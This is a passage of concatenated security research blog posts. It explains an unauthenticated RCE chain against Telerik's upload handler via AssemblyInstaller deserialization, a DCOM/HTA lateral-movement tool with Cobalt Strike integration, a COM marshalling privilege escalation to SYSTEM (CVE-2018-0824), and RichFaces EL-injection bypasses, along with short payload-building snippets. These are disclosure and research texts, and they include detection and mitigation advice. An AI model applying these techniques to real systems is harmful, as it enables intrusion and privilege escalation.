The problem here is that by default the account that the IIS worker process w3wp.exe runs with is a special account like IIS AppPool\DefaultAppPool. And such an account usually does not have write permissions to the web document root directory like C:\inetpub\wwwroot or similar. Additionally, the web document root of the web application can also be somewhere else and may not be known. So simply writing an ASP.NET web shell probably won't work in many cases.
The Dead End
This was exactly the case when we faced Managed Workplace RMM by Avast Business in a red team assessment where we didn't want to make too much noise. Additionally, unauthenticated access to all *.aspx pages except for Login.aspx was denied, i.e., the handler Telerik.Web.UI.DialogHandler.aspx for exploiting CVE-2017-9248 was not reachable, and the other one, Telerik.Web.UI.SpellCheckHandler.axd, was not registered. So, CVE-2017-11317 seemed to be the only option left.
By enumerating known versions of Telerik Web UI, one request to upload to C:\Windows\Temp was finally successful. But an upload to C:\inetpub\wwwroot did not succeed. And since we did not have access to an installation of Managed Workplace, we had no insights into its directory structure. So this seemed to be a dead end.
The New Avenue
While tracing the path of the provided rauPostData through the Telerik code, one aspect became apparent that had never been mentioned by anyone else before: the exploitation of CVE-2017-11317 was always advertised as an arbitrary file upload. This seems obvious, as the handler's name is AsyncUploadHandler and rauPostData contains the upload configuration.
But a closer look at the code that processes the rauPostData shows that it is expected to consist of two parts separated by a &.
The first part is the JSON data (line 9), and the second part is the assembly qualified type name (line 10) that the JSON data should be deserialized to. The call in line 11 then ends up in SerializationService.Deserialize(string, Type).
Here a JavaScriptSerializer gets parameterized with the type provided in the rauPostData. That means this is an arbitrary JavaScriptSerializer deserialization!
From the research Friday the 13th JSON Attacks by Alvaro Muñoz & Oleksandr Mirosh it is known that arbitrary JavaScriptSerializer deserialization can be harmful if the expected type can be specified by the attacker. During deserialization, appropriate setter methods get called. A suitable gadget is the System.Configuration.Install.AssemblyInstaller, which allows the loading of a DLL by specifying its path. If the DLL is a mixed mode assembly, its DllMain() entry point gets called on load, which allows the execution of arbitrary code in the context of the w3wp.exe process.
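Putting the pieces together, a forged rauPostData could look like this (the JSON property name Path and the shortened assembly-qualified type name are illustrative assumptions, not captured traffic):

```python
import json

# First part: JSON that the JavaScriptSerializer maps onto the target type;
# setting Path would point the AssemblyInstaller at the previously uploaded DLL.
json_part = json.dumps({"Path": "C:\\Windows\\Temp\\evil.dll"})

# Second part: the type the JSON should be deserialized to.
type_part = ("System.Configuration.Install.AssemblyInstaller, "
             "System.Configuration.Install")

rau_post_data = json_part + "&" + type_part
```
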
This allowed the remote code execution on Managed Workplace without authentication. The issue has been addressed and should be fixed in Managed Workplace 11 SP4 MR2.
Conclusion
So CVE-2017-11317 can be exploited even without the requirement of being able to write to the web document root:
Upload a mixed mode assembly DLL to a writable location using the regular AsyncUploadConfiguration exploit.
Load the uploaded DLL and thereby trigger its DllMain() function using the AssemblyInstaller exploit described above.
This is an excellent example that revisiting old vulnerabilities can be worthwhile and result in new ways out of a supposed dead end.
[1] The original blog post was deleted. But, you know, the Internet never forgets. ;)
The following blog post introduces a new lateral movement technique that combines the power of DCOM and HTA. The research
on this technique is partly an outcome of our recent research efforts on COM Marshalling:
Marshalling to SYSTEM - An analysis of CVE-2018-0824.
Previous Work
Several lateral movement techniques using DCOM were discovered in the past by
Matt Nelson,
Ryan Hanson,
Philip Tsukerman and
@bohops. A good overview of all the known techniques can be found in the
blog post by Philip Tsukerman. Most of the existing techniques execute commands via
ShellExecute(Ex). Some COM objects provided by Microsoft Office allow you to execute script code (e.g. VBScript), which
makes detection and forensics even harder.
LethalHTA
LethalHTA is based on a very well-known COM object that was used in all the Office Moniker attacks in the past (see
FireEye's blog post):
ProgID: "htafile"
CLSID : "{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
AppID : "{40AEEAB6-8FDA-41E3-9A5F-8350D4CFCA91}"
Using James Forshaw's
OleViewDotNet, we get some details on the COM object. The COM object runs as a local server.
It has an App ID and default
launch and
access permissions. Only COM objects having an App ID can be used for lateral movement.
It also implements various interfaces as we can see from OleViewDotNet.
One of the interfaces is
IPersistMoniker. This interface is used to save/restore a COM object's state to/from an
IMoniker instance.
Our initial plan was to create the COM object and restore its state by calling the
IPersistMoniker->Load() method with a
URLMoniker pointing to an HTA file. So we created a small program and ran it in Visual Studio.
But calling
IPersistMoniker->Load() returned an error code
0x80070057. After some debugging we realized that the error code came from a call to
CUrlMon::GetMarshalSizeMax(). That method is called during custom marshalling of a URLMoniker. This makes perfect
sense since we called
IPersistMoniker->Load() with a URLMoniker as a parameter. Since we do a method call on a remote COM object the parameters
need to get (custom) marshalled and sent over RPC to the RPC endpoint of the COM server.
So looking at the implementation of
CUrlMon::GetMarshalSizeMax() in IDA Pro we can see a call to
CUrlMon::ValidateMarshalParams() at the very beginning.
At the very end of this function we can find the error code set as return value of the function. Microsoft is validating
the
dwDestContext parameter. If the parameter is
MSHCTX_DIFFERENTMACHINE (0x2) then we eventually reach the error code.
As we can see from the references to
CUrlMon::ValidateMarshalParams() the method is called from several functions during marshalling.
In order to bypass the validation we can take the same approach as described in our last
blog post: Creating a fake object. The fake object needs to implement
IMarshal and
IMoniker. It forwards all calls to the
URLMoniker instance. To bypass the validation the implementation methods for
CUrlMon::GetMarshalSizeMax,
CUrlMon::GetUnmarshalClass,
CUrlMon::MarshalInterface
need to modify the
dwDestContext parameter to MSHCTX_NOSHAREDMEM(0x1). The implementation for
CUrlMon::GetMarshalSizeMax() is shown in the following code snippet.
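The original snippet is C++; reduced to pseudo-Python, the wrapper's job is just to rewrite one argument before forwarding to the real URLMoniker implementation (a sketch of the idea, not the actual COM code):

```python
MSHCTX_NOSHAREDMEM = 0x1
MSHCTX_DIFFERENTMACHINE = 0x2

def get_marshal_size_max(real_impl, riid, pv, dw_dest_context,
                         pv_dest_context, mshlflags):
    """Forwarding wrapper: force a context that passes ValidateMarshalParams."""
    if dw_dest_context == MSHCTX_DIFFERENTMACHINE:
        dw_dest_context = MSHCTX_NOSHAREDMEM
    # forward to the real URLMoniker's implementation
    return real_impl(riid, pv, dw_dest_context, pv_dest_context, mshlflags)
```
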
And that's all we need to bypass the validation. Of course we could also patch the code in
urlmon.dll. But that would require us to call
VirtualProtect() to make the page writable and modify
CUrlMon::ValidateMarshalParams() to always return zero. Calling
VirtualProtect() might get caught by EDR or "advanced" AV products so we wouldn't recommend it.
Now we are able to call
IPersistMoniker->Load() on the remote COM object. The COM object implemented in
mshta.exe will load the HTA file from the URL and evaluate its content. As you already know the HTA file can contain
script code such as JScript or VBScript. You can even combine our technique with James Forshaw's
DotNetToJScript to run your payload directly from memory!
It should be noted that the file doesn't necessarily need to have the
hta file extension. Extensions such as
html,
txt,
rtf work fine as well, as does no extension at all.
LethalHTA and LethalHTADotNet
We created implementations of our technique in
C++ and
C#. You can run them as standalone programs. The C++ version is more of a proof-of-concept and might help you create
a reflective DLL from it. The C# version can also be loaded as an Assembly with
Assembly.Load(Byte[]), which makes it easy to use in a PowerShell script. You can find both implementations under
releases on our
GitHub.
CobaltStrike Integration
To be able to easily use this technique in our day-to-day work we created a Cobalt Strike Aggressor Script called
LethalHTA.cna that integrates the .NET implementation (LethalHTADotNet) into Cobalt Strike by providing two distinct
methods for lateral movement that are integrated into the GUI, named
HTA PowerShell Delivery (staged - x86)
and
HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)
The
HTA PowerShell Delivery method allows executing a PowerShell-based, staged beacon on the target system. Since the
PowerShell beacon is staged, the target systems need to be able to reach the HTTP(S) host and TeamServer (which are in
most cases on the same system).
The
HTA .NET In-Memory Delivery takes the technique a step further by implementing a memory-only solution that provides
far more flexibility in terms of payload delivery and stealth. Using this option it is possible to tunnel the HTA
delivery/retrieval process through the beacon and also to specify a proxy server. If the target system is not able to
reach the TeamServer or any other Internet-connected system, an
SMB listener can be used instead. This allows reaching systems deep inside the network by bootstrapping an SMB beacon
on the target and connecting to it via named pipe from one of the internal beacons.
Due to the techniques used, everything is done within the
mshta.exe process without creating additional processes.
The combination of two techniques, in addition to the HTA attack vector described above, is used to execute everything in-memory.
Utilizing
DotNetToJScript, we are able to load a small .NET class (SCLoader) that dynamically determines the process's architecture (x86 or x64) and then executes the included stageless
beacon shellcode. This technique can also be re-used in other scenarios where
it is not apparent which architecture is used before exploitation.
For a detailed explanation of the steps involved visit our
GitHub Project.
Detection
To detect our technique you can watch for files inside the INetCache (%windir%\[System32 or SysWOW64]\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\) folder containing
"ActiveXObject". This is due to
mshta.exe caching the payload file. Furthermore it can be detected by an
mshta.exe process spawned by
svchost.exe.
In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:
A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects.
An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.
The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.
The keywords "COM" and "serialized" pretty much jumped out at me when the advisory came out.
Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
Before I go into details I want to give you a quick introduction into COM and how deserialization/marshalling works.
As I'm far from being an expert on COM, all this information is either based on the great book "Essential COM" by Don Box or the awesome Infiltrate '17 Talk "COM in 60 seconds".
I have skipped several details (IDL/MIDL, Apartments, Standard Marshalling, etc.) just to keep the introduction short.
Introduction to COM and Marshalling
COM (Component Object Model) is a Windows middleware whose primary goal is reusable code (components).
In order to develop reusable C++ code, Microsoft engineers designed COM in an object-oriented manner having the following key aspects in mind:
Portability
Encapsulation
Polymorphism
Separation of interfaces from implementation
Object extensibility
Resource Management
Language independence
COM objects are defined by an interface and implementation class.
Both interface and implementation class are identified by a GUID.
A COM object can implement several interfaces using inheritance.
All COM objects implement the IUnknown interface which looks like the following class definition in C++:
The QueryInterface() method is used to cast a COM object to a different interface implemented by the COM object.
The AddRef() and Release() methods are used for reference counting.
To keep it short, I'd rather go on with an existing COM object instead of creating an artificial example COM object.
A Control Panel COM object is identified by the GUID {06622D85-6856-4460-8DE1-A81921B41C4B}. To find out more about the COM object we could analyze the registry manually or just use the great tool "OleView .NET".
The "Control Panel" COM object implements several interfaces as we can see in the screenshot of OleView .NET:
The implementation class of the COM object (COpenControlPanel) can be found in shell32.dll.
To open a "Control Panel" programmatically we make use of the COM API:
In line 6 we initialize the COM environment
In line 7 we create an instance of a "Control Panel" object
In line 8 we cast the instance to the IOpenControlPanel interface
In line 9 we open the "Control Panel" by calling the "Open" method
Inspecting the COM object in the debugger after running until line 9 shows us the virtual function table (vTable) of the object:
The function pointers in the vTable of the object point to the actual implementation functions in shell32.dll.
The reason for that is that the COM object was created as a so-called InProc server, which means that shell32.dll
got loaded into the current process address space. When passing CLSCTX_ALL, CoCreateInstance() tries to create an InProc server first.
If it fails, other activation methods are tried (see CLSCTX enumeration).
By changing the CLSCTX_ALL parameter to function CoCreateInstance() to CLSCTX_LOCAL_SERVER and running the program again we can notice some differences:
The vTable of the object contains now function pointers from the OneCoreUAPCommonProxyStub.dll.
And the 4th function pointer, which corresponds to the Open() method, now points to OneCoreUAPCommonProxyStub!ObjectStublessClient3().
The reason for that is that we created the COM object as an out-of-process server.
The following diagram tries to give you an architectural overview (shamelessly borrowed from Project Zero):
The function pointers in the COM object point to functions of the proxy class.
When we execute the IOpenControlPanel::Open() method, the method OneCoreUAPCommonProxyStub!ObjectStublessClient3() gets called on the proxy.
The proxy class itself eventually calls RPC methods (e.g. RPCRT4!NdrpClientCall3) to send the parameters to the RPC server in the out-of-process server.
The parameters need to get serialized/marshalled to send them over RPC.
In the out-of-process-server the parameters get deserialized/unmarshalled and the Stub invokes shell32!COpenControlPanel::Open().
For non-complex parameters like strings the serialization/marshalling is trivial as these are sent by value.
How about complex parameters like COM objects?
As we can see from the method definition of IOpenControlPanel::Open() the third parameter is a pointer to an IUnknown COM object:
The answer is that a complex object can either get marshalled by reference (standard marshalling) or the serialization/marshalling logic can be customized by implementing the IMarshal interface (custom marshalling).
The IMarshal interface has a few methods as we can see in the following definition:
During serialization/marshalling of a COM object the IMarshal::GetUnmarshalClass() method gets called by the COM runtime, which returns the GUID of the class to be used for unmarshalling.
Then the method IMarshal::GetMarshalSizeMax() is called to prepare a buffer for marshalling data.
Finally the IMarshal::MarshalInterface() method is called which writes the custom marshalling data to the IStream object.
The COM runtime sends the GUID of the "Unmarshal class" and the IStream object via RPC to the server.
On the server the COM runtime creates the "Unmarshal class" using the CoCreateInstance() function, casts it to the IMarshal interface using QueryInterface() and eventually invokes the
IMarshal::UnmarshalInterface() method on the "Unmarshal class" instance, passing the IStream as a parameter.
And that's also where all the misery starts ...
Diffing the patch
After downloading the patch for Windows 8.1 x64 and extracting the files, I found two patched DLLs related to Microsoft COM:
oleaut32.dll
comsvcs.dll
Using Hexray's IDA Pro and Joxean Koret's Diaphora I analyzed the changes made by Microsoft.
In oleaut32.dll several functions were changed but nothing special related to deserialization/marshalling:
In comsvcs.dll only four functions were changed:
Clearly, one method stood out: CMarshalInterceptor::UnmarshalInterface().
The method CMarshalInterceptor::UnmarshalInterface() is the implementation of the UnmarshalInterface() method of the IMarshal interface.
As we already know from the introduction this method gets called during unmarshalling.
The bug
Further analysis was done on Windows 10 Redstone 4 (1803) including March patches (ISO from MSDN).
In the very beginning of the method CMarshalInterceptor::UnmarshalInterface() 20 bytes are read from the IStream object into a buffer on the stack.
Later the bytes in the buffer are compared against the GUID of the CMarshalInterceptor class (ECABAFCB-7F19-11D2-978E-0000F8757E2A).
If the bytes in the stream match we reach the function CMarshalInterceptor::CreateRecorder().
In function CMarshalInterceptor::CreateRecorder() the COM-API function ReadClassStm is called.
This function reads a CLSID(GUID) from the IStream and stores it into a buffer on the stack. Then the CLSID gets compared against the GUID of a CompositeMoniker.
If you followed the different Moniker "vulnerabilities" in 2016/17 (URLMoniker, ScriptMoniker, SOAPMoniker), you know that Monikers are definitely something you want to find in code which you might be able to trigger.
The IMoniker interface inherits from IPersistStream which allows a COM object implementing it to load/save itself from/to an IStream object. Monikers identify objects uniquely and can locate, activate and get a reference to the object by calling the BindToObject() method of the IMoniker instance.
If the CLSID doesn't match the GUID of the CompositeMoniker we follow the path to the right.
Here, the COM-API function CoCreateInstance() is called with the CLSID read from the IStream as the first parameter. If COM finds the specific class and is able to cast it to an IMoniker interface we reach the next basic block. Next, the IPersistStream::Load() method is called on the newly created instance which restores the saved Moniker state from the IStream object.
And finally we reach the call to BindToObject() which triggers all evil ...
Exploiting the bug
For exploitation I'm following the same approach as described in the bug tracker issue "DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege" by Project Zero.
I'm creating a fake COM Object class which implements the IStorage and IMarshal interfaces.
All implementation methods for the IStorage interface will be forwarded to a real IStorage instance as we will see later.
Since we are implementing custom marshalling, the COM runtime wants to know which class will be used to deserialize/unmarshal our fake object.
Therefore the COM runtime calls IMarshal::GetUnmarshalClass(). To trigger the Moniker, we just need to return the GUID of the "QC Marshal Interceptor Class" class (ECABAFCB-7F19-11D2-978E-0000F8757E2A).
The final step is to implement the IMarshal::MarshalInterface() method. As you already know the method gets called by the COM runtime to marshal an object into an IStream.
To trigger the call to IMoniker::BindToObject(), we only need to write the required bytes to the IStream object to satisfy all conditions in CMarshalInterceptor::UnmarshalInterface().
I tried to create a Script Moniker COM object with CLSID {06290BD3-48AA-11D2-8432-006008C3FBFC} using CoCreateInstance(). But hey, I got a "REGDB_E_CLASSNOTREG" error code. Looks like Microsoft introduced some changes.
Apparently, the Script Moniker wouldn't work anymore. So I thought of exploiting the bug using the "URLMoniker/hta file".
But luckily I remembered that in the method CMarshalInterceptor::CreateRecorder() we had a check for a CompositeMoniker CLSID.
So following the left path, we have a basic block in which 4 bytes are read from the stream into the stack buffer (var_78). Next we have a call to CMarshalInterceptor::LoadAndCompose() with the IStream, a pointer to an IMoniker interface pointer and the value from the stack buffer as parameters.
In this method an IMoniker instance is read and created from the IStream using the OleLoadFromStream() COM-API function. Later in the method, CMarshalInterceptor::LoadAndCompose() is called recursively to compose a CompositeMoniker. By invoking IMoniker::ComposeWith() a new IMoniker is created that is a composition of two monikers. The pointer to the new CompositeMoniker is stored in the pointer which was passed to the current function as a parameter. As we have seen in one of the previous screenshots, the BindToObject() method will be called on the CompositeMoniker later on.
As I remembered from Haifei Li's blog post there was a way to create a Script Moniker by composing a File Moniker and a New Moniker.
Armed with that knowledge I implemented the final part of the IMarshal::MarshalInterface() method.
I placed a SCT file in "c:\temp\poc.sct" which runs notepad from an ActiveXObject.
I first tried BITS as a target server, which didn't work.
Using OleView .NET I found out that BITS doesn't support custom marshalling (see EOAC_NO_CUSTOM_MARSHAL).
But the SearchIndexer service with CLSID {06622d85-6856-4460-8de1-a81921b41c4b} was running as SYSTEM and allowed custom marshalling.
So I created a PoC which has the following main() function.
The call to CoGetInstanceFromIStorage() will activate the target COM server and trigger the serialization of the FakeObject instance.
Since the COM-API function requires an IStorage as a parameter, we had to implement the IStorage interface in our FakeObject class.
After running the PoC we finally have notepad.exe running as SYSTEM.
The Fix
Microsoft is now checking a flag read from the thread-local storage. The flag is set in a different method not related to marshalling. If the flag isn't set, the function CMarshalInterceptor::UnmarshalInterface() will exit early without reading anything from the IStream.
Takeaways
Serialization/Unmarshalling without validating the input is bad. That's for sure.
Although this blog post only covers the privilege escalation aspect, the vulnerability can also be triggered from Microsoft Office or by an ActiveX control running in the browser. But I will leave this as an exercise to the reader :-)
RichFaces is one of the most popular component libraries for JavaServer Faces (JSF). In the past, two vulnerabilities (CVE-2013-2165 and CVE-2015-0279) have been found that allow RCE in versions 3.x ≤ 3.3.3 and 4.x ≤ 4.5.3. Code White discovered two new vulnerabilities which bypass the implemented mitigations. Thereby, all RichFaces versions including the latest 3.3.4 and 4.5.17 are vulnerable to RCE.
Introduction
JavaServer Faces (JSF) is a framework for building user interfaces for web applications. While there are only two major JSF implementations (i. e., Apache MyFaces and Oracle Mojarra), there are several component libraries, which provide additional UI components and features. RichFaces is one of the most popular of these component libraries and since it became part of JBoss (and thereby also part of Red Hat), it is also part of several JBoss/Red Hat products, for example JBoss EAP and JBoss Portal.[1]
In the past, two significant vulnerabilities have been discovered by Takeshi Terada of MBSD, which both affect various RichFaces versions:
CVE-2013-2165: Arbitrary Java Deserialization in RichFaces 3.x ≤ 3.3.3 and 4.x ≤ 4.3.2
Deserialization of arbitrary Java serialized object streams in org.ajax4jsf.resource.ResourceBuilderImpl allows remote code execution.
CVE-2015-0279: Arbitrary EL Evaluation in RichFaces 4.x ≤ 4.5.3 (RF-13977)
Injection of arbitrary EL method expressions in org.richfaces.resource.MediaOutputResource allows remote code execution.
Both vulnerabilities rely on the feature to generate images, video, sounds, and other resources on the fly based on data provided in the request. The provided data is either interpreted as a plain array of bytes or as a Java serialized object stream. In RichFaces 3.x, the data gets appended to the URL path preceded by either /DATB/ (byte array) or /DATA/ (Java serialized object stream); in RichFaces 4.x, the data is transmitted in a request parameter named db (byte array) or do (Java serialized object stream). In all cases, the binary data is compressed using DEFLATE and then encoded using a URL-safe Base64 encoding.
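The encoding pipeline can be sketched with nothing but the JDK. Note that the class name RichFacesDataCodec and the use of java.util.Base64's URL-safe alphabet are illustrative assumptions for this sketch; RichFaces ships its own codec classes, so this is a behavioral approximation rather than a byte-exact reimplementation:

```java
import java.io.ByteArrayOutputStream;
import java.util.Base64;
import java.util.zip.DataFormatException;
import java.util.zip.Deflater;
import java.util.zip.Inflater;

// Illustrative codec: DEFLATE compression plus URL-safe Base64, as used for
// the /DATA//DATB/ path segments (3.x) and db/do parameters (4.x)
public class RichFacesDataCodec {

    // Compress with DEFLATE, then apply URL-safe Base64 without padding
    public static String encode(byte[] data) {
        Deflater deflater = new Deflater();
        deflater.setInput(data);
        deflater.finish();
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[256];
        while (!deflater.finished()) {
            out.write(buf, 0, deflater.deflate(buf));
        }
        deflater.end();
        return Base64.getUrlEncoder().withoutPadding().encodeToString(out.toByteArray());
    }

    // Reverse direction: Base64-decode, then inflate back to the raw bytes
    public static byte[] decode(String encoded) {
        Inflater inflater = new Inflater();
        inflater.setInput(Base64.getUrlDecoder().decode(encoded));
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[256];
        try {
            while (!inflater.finished()) {
                out.write(buf, 0, inflater.inflate(buf));
            }
        } catch (DataFormatException e) {
            throw new RuntimeException(e);
        }
        inflater.end();
        return out.toByteArray();
    }
}
```

A payload generator would run a serialized object stream through encode() before placing it in the URL.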
CVE-2013-2165: Arbitrary Java Deserialization
This vulnerability is a straightforward Java deserialization vulnerability. When a RichFaces 3.x resource is requested, it eventually gets processed by ResourceBuilderImpl.getResourceDataForKey(String). If the requested resource key begins with /DATA/, the remaining data gets decoded and decompressed (using ResourceBuilderImpl.decrypt(byte[]), which actually, despite its name, does not incorporate encryption[2]) and finally deserialized without any further validation.
In RichFaces 4.x, it is basically the same: the org.richfaces.resource.DefaultCodecResourceRequestData holds the request data passed via db/do and Util.decodeObjectData(String) is used in the latter case. That method then decodes and decompresses the data in a similar way and finally deserializes it without any further validation.
This can be exploited with ysoserial using a suitable gadget.
The arbitrary Java deserialization was patched in RichFaces 3.3.4 and 4.3.3 by introducing look-ahead deserialization with a limited set of whitelisted classes.[3] Due to several aftereffects, the list was extended occasionally.[4]
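The general shape of such a look-ahead filter can be sketched by overriding ObjectInputStream.resolveClass(), which is consulted for each class descriptor before any object of that class is instantiated. The class name and whitelist entries below are illustrative assumptions, not RichFaces's actual implementation or list:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.Set;

// Look-ahead deserialization: reject unknown classes before instantiation
public class WhitelistObjectInputStream extends ObjectInputStream {

    // Illustrative entries only, not RichFaces's actual whitelist
    private static final Set<String> WHITELIST = Set.of(
            "java.lang.Integer",
            "java.lang.Number");

    public WhitelistObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        if (!WHITELIST.contains(desc.getName())) {
            throw new InvalidClassException("Class not whitelisted: " + desc.getName());
        }
        return super.resolveClass(desc);
    }

    // Convenience helpers so the filter can be exercised easily
    public static byte[] serialize(Object obj) {
        try {
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            new ObjectOutputStream(bos).writeObject(obj);
            return bos.toByteArray();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    public static Object deserialize(byte[] data) {
        try (WhitelistObjectInputStream in =
                new WhitelistObjectInputStream(new ByteArrayInputStream(data))) {
            return in.readObject();
        } catch (IOException | ClassNotFoundException e) {
            throw new RuntimeException(e);
        }
    }
}
```

A whitelisted Integer deserializes fine, while any class missing from the list is rejected before its readObject logic can run.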
CVE-2015-0279: Arbitrary EL Evaluation
The RichFaces issue RF-13977 corresponding to this vulnerability is public and actually quite detailed. It describes that the RichFaces Showcase application utilizes the MediaOutputResource dynamic resource builder. The data object passed in the do URL parameter holds the state object, which is used by MediaOutputResource.restoreState(FacesContext, Object) to restore its state. This includes the contentProducer field, which is expected to be a MethodExpression object. That MethodExpression later gets invoked by MediaOutputResource.encode(FacesContext) to pass execution to the referenced method to generate the resource's contents. In the mentioned example, the EL method expression #{mediaBean.process} references the process method of a Java Bean named mediaBean.
Now the problem with that is that the EL expression can be changed, even just with basic Linux utilities. There is no protection in place that would prevent one from tampering with it. Depending on the EL implementation, this allows arbitrary code execution, as demonstrated by the reporter:
However, exploitation of this vulnerability is not always that easy, especially if there is no existing sample of a valid do state object that can be tampered with. Creating the state object from scratch requires the use of compatible libraries, otherwise the deserialization may fail. Moreover, not every EL implementation allows parameterized invocations in method expressions, as support for these was only added in EL 2.2. EL exploitation is quite an interesting topic in itself.
The patch for this issue introduced in RichFaces 4.5.4 was to check whether the expression of the contentProducer contains a parenthesis. This prevents the invocation of methods with parameters like loadClass("java.lang.Runtime").
The Present
The nature of the past vulnerabilities led to the assumption that there may be a way to bypass the mitigations. And after some research, two ways were found to gain remote code execution in a similar manner, also affecting the latest RichFaces versions 3.3.4 and 4.5.17:
RF-14310: Arbitrary EL Evaluation in RichFaces 3.x ≤ 3.3.4
Injection of arbitrary EL expressions allows remote code execution via org.richfaces.renderkit.html.Paint2DResource.
RF-14309: Arbitrary EL Evaluation in RichFaces 4.5.3 ≤ 4.5.17
Injection of arbitrary EL variable mapper allows to bypass mitigation of CVE-2015-0279 and thereby remote code execution.
Although the issues RF-14309 and RF-14310 were discovered in the order of their identifiers, we'll explain them in the opposite order. Also note that the issues are not public but only visible to persons responsible for resolving security issues.
RF-14310: Arbitrary EL Evaluation
This vulnerability is very similar to CVE-2015-0279/RF-13977. While the injection of arbitrary EL expressions was possible right from the beginning, there is always a need to get them triggered somehow. This similarity was found in the org.richfaces.renderkit.html.Paint2DResource class. When a resource of that type gets requested, its send(ResourceContext) method gets called. The resource data transmitted in the request must be an org.richfaces.renderkit.html.Paint2DResource$ImageData object. This passes the whitelisting as ImageData extends org.ajax4jsf.resource.SerializableResource, which actually was introduced in 3.3.4 to fix the Java deserialization vulnerability.
RF-14309: Arbitrary EL Evaluation
As the patch to CVE-2015-0279 introduced in 4.5.4 disallowed the use of parentheses in the EL method expression of the contentProducer, it seemed like a dead end. But if you are familiar with EL internals, you would know that expressions can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i. e., name in ${prefix:name()}) and variables (i. e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately, various VariableMapper implementations were added to the whitelist starting with 4.5.3.[5]
So to exploit this, all that is needed is to use a variable in the contentProducer method expression like ${dummy.toString} and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression of your choice.
The interesting thing about these classes is that they have an equals(Object) method, which eventually calls getType(ELContext) on an EL value expression. For example, if equals(Object) gets called on a ValueExpressionValueBindingAdapter object with a ValueExpression object as other, getType(ELContext) of other gets called. And as the value expression has to be evaluated to determine its resulting type, this can be used as a Java deserialization primitive to execute EL value expressions on deserialization.
This is very similar to the Myfaces1 and Myfaces2 gadgets in ysoserial.[6] However, while they require Apache MyFaces, this one is independent from the JSF implementation and only requires a matching EL implementation.
Unfortunately, this gadget does not work for RichFaces. The reason for that is that ValueExpressionValueBindingAdapter needs to have a valid value binding as getType(ELContext) gets called first. But javax.faces.el.ValueBinding is not whitelisted. And wrapping it in a StateHolderSaver does not work because the state object is of type Object[] and therefore the cast to Serializable[] in StateHolderSaver.restore(FacesContext) fails.[7] This is probably a bug in RichFaces as Serializable[] is not whitelisted either although StateHolderSaver uses Serializable[] internally on StateHolder instances.
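The failing cast can be reproduced in isolation: a Java array cast is checked against the array's runtime component type, not against the types of the elements it happens to contain, so an Object[] cannot be cast to Serializable[] even if every element is serializable. A minimal sketch (the class name is made up for illustration):

```java
public class ArrayCastDemo {

    // Mimics the cast StateHolderSaver.restore() performs on the saved state
    public static boolean castSucceeds(Object state) {
        try {
            java.io.Serializable[] values = (java.io.Serializable[]) state;
            return values != null;
        } catch (ClassCastException e) {
            // Thrown when the runtime type of 'state' is Object[]
            return false;
        }
    }
}
```

So a state object serialized as Object[] fails the cast even though an array created as Serializable[] with identical contents would pass.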
Conclusion
It has been shown that all RichFaces versions 3.x and 4.x including the latest 3.3.4 and 4.5.17 are exploitable by one or multiple vulnerabilities:
RichFaces 3
3.1.0 ≤ 3.3.3: CVE-2013-2165
3.1.0 ≤ 3.3.4: RF-14310
RichFaces 4
4.0.0 ≤ 4.3.2: CVE-2013-2165
4.0.0 ≤ 4.5.4: CVE-2015-0279
4.5.3 ≤ 4.5.17: RF-14309
As we can't expect official patches, one way to mitigate all these vulnerabilities is to block requests to the concerned URLs:
Blocking requests of URLs with paths containing /DATA/ should mitigate CVE-2013-2165 and RF-14310.
Blocking requests of URLs with paths containing org.richfaces.resource.MediaOutputResource (literally or URL encoded) should mitigate CVE-2015-0279 and RF-14309.
[7] This actually depends on the JSF API implementation and version. For example, org.jboss.spec.javax.faces/jboss-jsf-api_2.1_spec and org.glassfish/javax.faces do have this unfortunate behavior in all versions while com.sun.faces/jsf-api added it in version 2.1.0.
In a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no
outgoing TCP connections were possible to exploit the vulnerability. He asked me
whether I had an idea how he could still get a SYSTEM shell and the outcome of
the short research effort is documented here.
Introduction Adobe ColdFusion & AMF
Before we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an application development platform like ASP.NET, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).
The AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies.
Several data types are supported in AMF0 and AMF3.
For example the AMF3 format supports the following protocol elements with their type identifier:
Details about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see
https://en.wikipedia.org/wiki/Action_Message_Format).
There are several implementations for AMF in different languages.
For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used
in Adobe ColdFusion.
The BlazeDS AMF serializer can serialize complex object graphs.
The serializer starts with the root object and serializes its members
recursively.
Two general serialization techniques are supported by BlazeDS to serialize complex objects:
